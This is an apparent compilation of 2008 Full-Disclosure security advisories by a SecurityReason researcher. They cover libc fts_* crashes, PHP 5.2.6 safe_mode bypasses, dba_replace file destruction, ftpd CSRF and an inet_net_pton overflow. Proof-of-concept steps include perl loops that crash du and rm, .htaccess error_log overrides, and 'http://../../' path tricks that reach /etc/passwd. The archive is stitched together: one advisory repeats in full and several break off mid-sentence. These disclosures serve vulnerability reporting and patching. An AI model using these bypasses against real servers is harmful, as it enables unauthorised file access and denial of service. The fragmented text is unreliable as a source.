long fts_number;/* local numeric value */
void *fts_pointer; /* local address value */
struct _ftsent *fts_parent; /* parent directory */
struct _ftsent *fts_link; /* next file structure */
struct _ftsent *fts_cycle; /* cycle structure */
struct stat *fts_statp; /* stat(2) information */
} FTSENT;
- --- 1. libc:fts_*():multiple vendors, Denial-of-service ---
The main problem exist in fts_level from ftsent structure. Type of
fts_level is short.
let's see /usr/src/lib/libc/gen/fts.c (OpenBSD)
- ---line-616-625---
/*
* Figure out the max file name length that can be stored in the
* current path -- the inner loop allocates more path as necessary.
* We really wouldn't have to do the maxlen calculations here, we
* could do them in fts_read before returning the path, but it's a
* lot easier here since the length is part of the dirent structure.
*
* If not changing directories set a pointer so that can just append
* each new name into the path.
*/
- ---line-616-625---
"We really wouldn't have to do the maxlen calculations here..."
Here should be some level or pathlen monitor. Should.
short fts_level;/* depth (-1 to N) */
fts_level is short type, no aleph zero
- ---line-247-249---
#define NAPPEND(p) \
(p->fts_path[p->fts_pathlen - 1] == '/' \
? p->fts_pathlen - 1 : p->fts_pathlen)
- ---line-247-249---
this function will crash, when we will requests to wrong allocated memory.
So, what is wrong:
127# pwd
/home/cxib
127# du /home/
4 /home/cxib/.ssh
Segmentation fault (core dumped)
127# rm -rf Samotnosc
Segmentation fault (core dumped)
127# chmod -R 000 Samotnosc
Segmentation fault (core dumped)
127# gdb -q du
(no debugging symbols found)
(gdb) r /home/
Starting program: /usr/bin/du /home/
4 /home/cxib/.ssh
Program received signal SIGSEGV, Segmentation fault.
0x0b3e65c1 in fts_read (sp=0x8a1b11c0) at /usr/src/lib/libc/gen/fts.c:385
385 name: t = sp->fts_path + NAPPEND(p->fts_parent);
(gdb) print p->fts_level
$1 = -19001
(gdb) print p->fts_path
$2 = 0x837c9000
and we have answer.
127# cd /home/cxib
127# mkdir len
127# cd len
127# mkdir 24
127# mkdir 23
127# mkdir 22
127# cd 22
127# perl -e '$a="C"x22;for(1..5){ ! -d $a and mkdir $a and chdir $a }'
127# du .
Segmentation fault (core dumped)
127# cd ../23/
127# perl -e '$a="C"x23;for(1..5){ ! -d $a and mkdir $a and chdir $a }'
127# du .
Segmentation fault (core dumped)
127# cd ../24/
127# perl -e '$a="C"x24;for(1..5){ ! -d $a and mkdir $a and chdir $a }'
127# du .
/* Will print correctly output */
In all cases, the function should return an error flag "ENAMETOOLONG".
The security consequences can be derived from the crash of the program.
All combinations like " while ( fts_read ( ) ) " and " ftw ( ) "
function, constitute a potential risk.
Examples of vulnerable programs:
du
rm
chmod -R
chgrp -R
In the case of Microsoft Interix, the situati
[Full-disclosure] SecurityReason: PHP 5.2.6 SAPI php_getuid() overload
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ SecurityReason.com : PHP 5.2.6 SAPI php_getuid() overload ]
Author: Maksymilian Arciemowicz
securityreason.com
Date:
- - Written: 20.11.2008
- - Public: 05.12.2008
SecurityReason Research
SecurityAlert Id: 59
SecurityRisk: High
Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/59
Vendor: http://www.php.net
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.
http://pl.php.net/manual/pl/refs.utilspec.server.php
- --- 1.PHP 5.2.6 SAPI php_getuid() overload ---
Using PHP 5.2.6, as a Apache module can bypass many security points. To
understand this issue, first we need know, where is the problem.
127# cd /www/trafka
127# ls -la
total 12
drwxr-xr-x 2 www www 512 Sep 10 03:49 .
drwxr-xr-x 4 www www 512 Sep 10 03:41 ..
- -rw-r--r-- 1 www www 26 Sep 10 03:49 .htaccess
- -rw-r--r-- 1 www www 33 Sep 10 03:49 not.php
- -rw-r--r-- 1 www www 107 Sep 10 03:49 pufff.php
- -rw-r--r-- 1 www www 27 Sep 10 03:49 sleep.php
127# cat .htaccess
php_value error_log /etc/
127# cat not.php
127# cat pufff.php
127# cat sleep.php
127# apachectl restart
/usr/local/sbin/apachectl restart: httpd restarted
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=
127#
Now error_log is empty
Example exploit:
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
any new "apache child" process, allow overload environment like error_log.
127# apachectl restart
/usr/local/sbin/apachectl restart: httpd restarted
127# ps -aux -U www
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
www 6361 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6362 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6363 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6364 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6365 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# ps -aux -U www
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
www 6361 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6362 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6363 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6364 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6365 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=
127# ps -aux -U www
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
www 6361 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6362 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6363 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6364 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6365 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
127#So what is wrong?
Let's try to understand this problem. Let's start with a difference
www 6361 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
and
www 6361 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
RSS: 14288-14248 = 40
memory leak? No.
In first request, we have declared error_log, via .htaccess.
- --- main/main.c ---
...
STD_PHP_INI_ENTRY("error_log", NULL,
PHP_INI_ALL,
OnUpdateErrorLog,
[Full-disclosure] SecurityReason.com : PHP 5.2.6 SAPI php_getuid() overload
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ SecurityReason.com : PHP 5.2.6 SAPI php_getuid() overload ]
Author: Maksymilian Arciemowicz
securityreason.com
Date:
- - Written: 20.11.2008
- - Public: 05.12.2008
SecurityReason Research
SecurityAlert Id: 59
SecurityRisk: High
Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/59
Vendor: http://www.php.net
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.
http://pl.php.net/manual/pl/refs.utilspec.server.php
- --- 1.PHP 5.2.6 SAPI php_getuid() overload ---
Using PHP 5.2.6, as a Apache module can bypass many security points. To
understand this issue, first we need know, where is the problem.
127# cd /www/trafka
127# ls -la
total 12
drwxr-xr-x 2 www www 512 Sep 10 03:49 .
drwxr-xr-x 4 www www 512 Sep 10 03:41 ..
- -rw-r--r-- 1 www www 26 Sep 10 03:49 .htaccess
- -rw-r--r-- 1 www www 33 Sep 10 03:49 not.php
- -rw-r--r-- 1 www www 107 Sep 10 03:49 pufff.php
- -rw-r--r-- 1 www www 27 Sep 10 03:49 sleep.php
127# cat .htaccess
php_value error_log /etc/
127# cat not.php
127# cat pufff.php
127# cat sleep.php
127# apachectl restart
/usr/local/sbin/apachectl restart: httpd restarted
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=
127#
Now error_log is empty
Example exploit:
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
any new "apache child" process, allow overload environment like error_log.
127# apachectl restart
/usr/local/sbin/apachectl restart: httpd restarted
127# ps -aux -U www
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
www 6361 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6362 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6363 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6364 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6365 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# ps -aux -U www
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
www 6361 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6362 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6363 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6364 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6365 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=
127# ps -aux -U www
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
www 6361 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6362 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6363 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6364 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
www 6365 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
127#So what is wrong?
Let's try to understand this problem. Let's start with a difference
www 6361 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
and
www 6361 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00
/usr/local/sbin/httpd
RSS: 14288-14248 = 40
memory leak? No.
In first request, we have declared error_log, via .htaccess.
- --- main/main.c ---
...
STD_PHP_INI_ENTRY("error_log", NULL,
PHP_INI_ALL,
OnUpdateErrorLog,
[Full-disclosure] SecurityReason : PHP 5.2.6 dba_replace() destroying file
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ SecurityReason.com PHP 5.2.6 dba_replace() destroying file ] Author: Maksymilian Arciemowicz http://securityreason.com Date: - - Written: 10.11.2008 - - Public: 28.11.2008 SecurityReason Research SecurityAlert Id: 58 SecurityRisk: Medium Affected Software: PHP 5.2.6 Advisory URL: http://securityreason.com/achievement_securityalert/58 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. NOTE: These functions build the foundation for accessing Berkeley DB style databases. dba_replace - Replace or insert entry - --- 1. dba_replace() destroying file --- Function dba_replace() are not filtring strings key and value. There is a possibility the destruction of the file. # cat /www/dba.hack.php # cat /www/about.ini PATH=/ CURR=. HOME=/home/ # php /www/dba.hack.php # cat /www/about.ini PATH=/ CURR=. HOME=/www/ # Well. But, lets try use # cat /www/dba.ham.php # php /www/dba.ham.php # cat /www/about.ini # Now /www/about.ini, is emtpy. - --- 2. How to fix --- Fixed in CVS http://cvs.php.net/viewvc.cgi/php-src/NEWS?r1=1.2027.2.547.2.1313&r2=1.2027.2.547.2.1314&; - --- 3. Greets --- sp3x p_e_a Infospec schain - --- 4. Contact --- Author: SecurityReason [ Maksymilian Arciemowicz ] Email: cxib [ a t] securityreason [d ot ] com GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg http://securityreason.com http://securityreason.pl -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (OpenBSD) iEYEARECAAYFAkkvKDcACgkQpiCeOKaYa9aRUgCgmsbU4uKeq1E+/yyIlQas9V14 e2MAoJobXQNRD8BNiDsHQYSNdOxIyQRc =Tb8r -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SecurityReason : PHP 5.2.6 (error_log) safe_mode bypass
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ]
Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- - Written: 10.11.2008
- - Public: 20.11.2008
SecurityReason Research
SecurityAlert Id: 57
CWE: CWE-264
SecurityRisk: Medium
Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/57
Vendor: http://www.php.net
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.
error_log
They allow you to define your own error handling rules, as well as
modify the way the errors can be logged. This allows you to change and
enhance error reporting to suit your needs.
- --- 0. error_log const. bypassed by php_admin_flag ---
The main problem is between using safe_mode in global mode
php.ini:
safe_mode = On
and declaring via php_admin_flag
...
php_admin_flag safe_mode On
When we create some php script in /www/ and try call to:
ini_set("error_log", "/hack/");
or in /www/.htaccess
php_value error_log "/hack/bleh.php"
Result:
Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid
is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0
Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect.
The script whose uid is 80 is not allowed to access /hack/ owned by uid
1001 in /www/phpinfo.php on line 4
It was for safe_mode declared in php.ini. But if we use
php_admin_flag safe_mode On
in httpd.conf, we will get only
Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect.
The script whose uid is 80 is not allowed to access /hack/ owned by uid
1001 in /www/phpinfo.php on line 4
syntax in .htaccess
php_value error_log "/hack/blehx.php"
is allowed and bypass safe_mode.
example exploit:
error_log("", 0);
- --- 2. How to fix ---
Fixed in CVS
http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup
Note:
Do not use safe_mode as a main safety.
--- 3. Greets ---
sp3x Infospec schain p_e_a pi3
- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.9 (FreeBSD)
iEYEARECAAYFAkklRdcACgkQpiCeOKaYa9bh0gCeN8rn2nWY0YUJ7QHmnxfD5TAe
8hgAmwV0vc0Mk7rIUY5KJezctW589ydy
=zM1X
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] multiple vendor ftpd - Cross-site request forgery
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ multiple vendor ftpd - Cross-site request forgery ] Author: Maksymilian Arciemowicz securityreason.com Date: - - Written: 03.09.2008 - - Public: 26.09.2008 SecurityReason Research SecurityAlert Id: 56 CVE: not assigned SecurityRisk: Low Affected Software: This problem has been discovered on OpenBSD 4.3 . - - Affected systems: + OpenBSD + NetBSD + FreeBSD + some linux - - Affected applications: + proFTPd + others Advisory URL: http://securityreason.com/achievement_securityalert/56 - --- 0.Description --- ftpd -- Internet File Transfer Protocol server The ftpd utility is the Internet File Transfer Protocol server process. The server uses the TCP protocol and listens at the port specified with the -P option or in the ``ftp'' service specification; see services(5). Cross-site request forgery, also known as one click attack, sidejacking or session riding and abbreviated as CSRF (Sea-Surf[1]) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user the website trusts. Contrary to cross-site scripting (XSS), which exploits the trust a user has for a particular site, cross-site request forgery exploits the trust that a site has for a particular user. http://en.wikipedia.org/wiki/Cross-site_request_forgery - --- 1. ftpd bsd - Cross-site request forgery --- The main problem exists in dividing long command for few others. The problem stems from the fact the use of the loop for(;;) and function fgets(). Example: Command "AA AAA AAA AAA AAA AAA AAA AAA AAA AAA AAA AAA AAA" will be split for 500 'AA AAA AAA AAA AAA AAA AA': command not understood. 500 'AA AAA AAA AAA AAA AAA AA' When we try request to ftp deamon via browsers and path is longer 512<, our URL will be split. /* FreeBSD 7.0 */ ftp://[EMAIL PROTECTED]///SYST return result from SYST command: 215 UNIX Type: L8 Version: BSD-199506 /* NetBSD 4.0 */ ftp://ftp.netbsd.org///SYST return result from SYST command: 215 UNIX Type: L8 V
[Full-disclosure] libc/net inet_net_pton() integer overflow
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[WLB-2008080064: inet_net_pton() integer overflow ]
Author: Maksymilian Arciemowicz (cxib)
SecurityReason.com
Date:
- - Written: 02.08.2008
- - Public: 22.08.2008
SecurityRisk: Low
It is a bug, without a high security risk. We are going informing all vendors,
about this problem.
Affected Software:
libc inet_net_pton.c
ver ISC Bind
- - OpenBSD fixed
Original URL WLB-2008080064 :
http://securityreason.com/wlb_show/WLB-2008080064
Vendor: http://www.isc.org/index.pl?/sw/bind/index.php
- --- 0.Description ---
inet_net_pton - Internet network number manipulation routines
SYNOPSIS:
int
inet_net_pton(int af, const char *src, void *dst, size_t size);
The inet_net_pton() function converts a presentation format Internet network
number (that is, printable form as held in a character string) to network
format (usually a struct in_addr or some other internal binary representation,
in network byte order). It returns the number of bits (either computed based
on the class, or specified with /CIDR), or -1 if a failure occurred (in which
case errno will have been set. It will be set to ENOENT if the Internet
network number was not valid).
Caution: The dst field should be zeroed before calling inet_net_pton() as the
function will only fill the number of bytes necessary to encode the network
number in network byte order.
The only value for af currently supported is AF_INET. size is the size of the
result buffer dst.
NETWORK NUMBERS (IP VERSION 4)
The external representation of Internet network numbers may be specified in one
of the following forms:
a
a.b
a.b.c
a.b.c.d
Any of the above four forms may have ``/bits'' appended where ``bits'' is in
the range 0-32 and is used to explicitly specify the number of bits in the
network address. When ``/bits'' is not specified the number of bits
- --- 1. libc/net inet_net_pton() integer overflow ---
The main problem exist in inet_net_pton() function. Let's see to this function
inet_net_pton.c
- ---
int
inet_net_pton(int af, const char *src, void *dst, size_t size)
{
switch (af) {
case AF_INET:
return (inet_net_pton_ipv4(src, dst, size));
default:
errno = EAFNOSUPPORT;
return (-1);
}
}
- ---
call to inet_net_pton_ipv4(). So let's see it..
- -START--
static int
inet_net_pton_ipv4(const char *src, u_char *dst, size_t size)
{
static const char
xdigits[] = "0123456789abcdef",
digits[] = "0123456789";
int n, ch, tmp, dirty, bits;
const u_char *odst = dst;
ch = *src++;
if (ch == '0' && (src[0] == 'x' || src[0] == 'X')
&& isascii(src[1]) && isxdigit(src[1])) {
/* Hexadecimal: Eat nybble string. */
if (size <= 0)
goto emsgsize;
*dst = 0, dirty = 0;
src++; /* skip x or X. */
while ((ch = *src++) != '\0' &&
isascii(ch) && isxdigit(ch)) {
if (isupper(ch))
ch = tolower(ch);
n = strchr(xdigits, ch) - xdigits;
assert(n >= 0 && n <= 15);
*dst |= n;
if (!dirty++)
*dst <<= 4;
else if (size-- > 0)
*++dst = 0, dirty = 0;
else
goto emsgsize;
}
if (dirty)
size--;
} else if (isascii(ch) && isdigit(ch)) {
/* Decimal: eat dotted digit string. */
for (;;) {
tmp = 0;
do {
n = strchr(digits, ch) - digits;
assert(n >= 0 && n <= 9);
tmp *= 10;
tmp += n;
if (tmp > 255)
goto enoent;
} while ((ch = *src++) != '\0' &&
isascii(ch) && isdigit(ch));
if (size-- <= 0)
goto emsgsize;
*dst++ = (u_char) tmp;
if (ch == '\0' || ch == '/')
break;
if (ch != '.')
goto enoent;
ch = *src++;
if (!isascii(ch) || !isdigit(ch))
goto enoent;
}
[Full-disclosure] PHP 5.2.6 chdir(), ftok() (standard ext) safe_mode bypass
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass ]
Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- - Written: 10.05.2008
- - Public: 17.06.2008
SecurityReason Research
SecurityAlert Id: 55
CVE: CVE-2008-2666
CWE: CWE-264
SecurityRisk: Medium
Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/55
Vendor: http://www.php.net
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from
C, Java and Perl with a couple of unique PHP-specific features thrown in. The
goal of the language is to allow web developers to write dynamically generated
pages quickly.
chdir ? Change directory
SYNOPSIS:
bool chdir ( string $directory )
http://pl.php.net/manual/en/function.chdir.php
ftok ? Convert a pathname and a project identifier to a System V IPC key
SYNOPSIS:
int ftok ( string $pathname , string $proj )
http://pl.php.net/manual/en/function.ftok.php
!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL
NOT LIST ALL VULNERABLE FUNCTIONS
- --- 1. chdir(), ftok() (from standard ext) and more safe_mode bypass ---
Let's see to chdir() function
- ---
PHP_FUNCTION(chdir)
{
char *str;
int ret, str_len;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str,
&str_len) == FAILURE) {
RETURN_FALSE;
}
if ((PG(safe_mode) && !php_checkuid(str, NULL,
CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)) {
RETURN_FALSE;
}
ret = VCWD_CHDIR(str);
if (ret != 0) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)",
strerror(errno), errno);
RETURN_FALSE;
}
RETURN_TRUE;
}
- ---
str is beeing checked by safe_mode
example:
- ---
Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80
is not allowed to access / owned by uid 0 in /www/mb/mb.php on line 8
- ---
in current directory, we should create subdir "http:". => it is possible to
create chdir("http://../../../../../../";)
and we are in /
Why?
TRUE==((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR))
|| php_check_open_basedir(str TSRMLS_CC)))
for
str="http://../../../../../../";
safe_mode will ignore all paths with http://
that same situation with ftok() function (and more)
- ---EXAMPLE1---
cxib# cat /www/wufff.php
cxib# ls -la /www/wufff.php
- -rw-r--r-- 1 www www 62 Jun 17 17:14 /www/wufff.php
cxib# php /www/wufff.php
/www
Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80
is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on line 3
/www
cxib#
- ---/EXAMPLE1---
- ---EXAMPLE2---
cxib# ls -la /www/wufff.php
- -rw-r--r-- 1 www www 74 Jun 17 17:13 /www/wufff.php
cxib# ls -la /www/http:
total 8
drwxr-xr-x 2 www www 512 Jun 17 17:12 .
drwxr-xr-x 19 www www 4608 Jun 17 17:13 ..
cxib# cat /www/wufff.php
http://../../etc/";);
echo getcwd()."\n";
?>
cxib# php /www/wufff.php
/www
/etc
cxib#
- ---/EXAMPLE2---
!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL
NOT LISTS ALL VULNERABLE FUNCTIONS
- --- 2. How to fix ---
Do not use safe_mode as a main safety
- --- 3. Greets ---
sp3x Infospec schain p_e_a Chujwamwdupe
- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.4 (FreeBSD)
iD8DBQFIWCCbW1OhNJH6DMURAsNnAJsEVuvHigC9EZfcg0hhFtlXJsaCMQCgl0w9
W6fcb5TR6GxN9osji+wQCqM=
=tyyL
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP 5.2.6 posix_access() (posix ext) safe_mode bypass
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[PHP 5.2.6 posix_access() (posix ext) safe_mode bypass ]
Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason.com
Date:
- - Written: 10.05.2008
- - Public: 17.06.2008
SecurityReason Research
SecurityAlert Id: 54
CVE: CVE-2008-2665
CWE: CWE-264
SecurityRisk: Low
Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/54
Vendor: http://www.php.net
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from
C, Java and Perl with a couple of unique PHP-specific features thrown in. The
goal of the language is to allow web developers to write dynamically generated
pages quickly.
posix_access ? Determine accessibility of a file
SYNOPSIS:
bool posix_access ( string $file [, int $mode ] )
http://pl2.php.net/manual/pl/function.posix-access.php
!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL
NOT LIST ALL VULNERABLE FUNCTIONS
- --- 1. PHP 5.2.6 posix_access() safe_mode bypass ---
Let's see to posix_access() function
- ---
PHP_FUNCTION(posix_access)
{
long mode = 0;
int filename_len, ret;
char *filename, *path;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l", &filename,
&filename_len, &mode) == FAILURE) {
RETURN_FALSE;
}
path = expand_filepath(filename, NULL TSRMLS_CC);
if (!path) {
POSIX_G(last_error) = EIO;
RETURN_FALSE;
}
if (php_check_open_basedir_ex(path, 0 TSRMLS_CC) ||
(PG(safe_mode) && (!php_checkuid_ex(filename, NULL,
CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS {
efree(path);
POSIX_G(last_error) = EPERM;
RETURN_FALSE;
}
ret = access(path, mode);
efree(path);
if (ret) {
POSIX_G(last_error) = errno;
RETURN_FALSE;
}
RETURN_TRUE;
}
- ---
var_dump(posix_access("http://../../../etc/passwd";))==True
var_dump(posix_access("/etc/passwd"))==False
Why?
Because path = expand_filepath(filename, NULL TSRMLS_CC); will change
"http://../../../etc/passwd"; to path=/etc/passwd
(PG(safe_mode) && (!php_checkuid_ex(filename, NULL,
CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS))) will check realy path
"http://../../../etc/passwd";. http:// is using in php_checkuid_ex(), so
safe_mode is bypassed.
!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL
NOT LIST ALL VULNERABLE FUNCTIONS
- --- 2. How to Fix ---
Do not use safe_mode as a main safety
- --- 3. Greets ---
sp3x Infospec schain p_e_a Chujwamwdupe
- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.4 (FreeBSD)
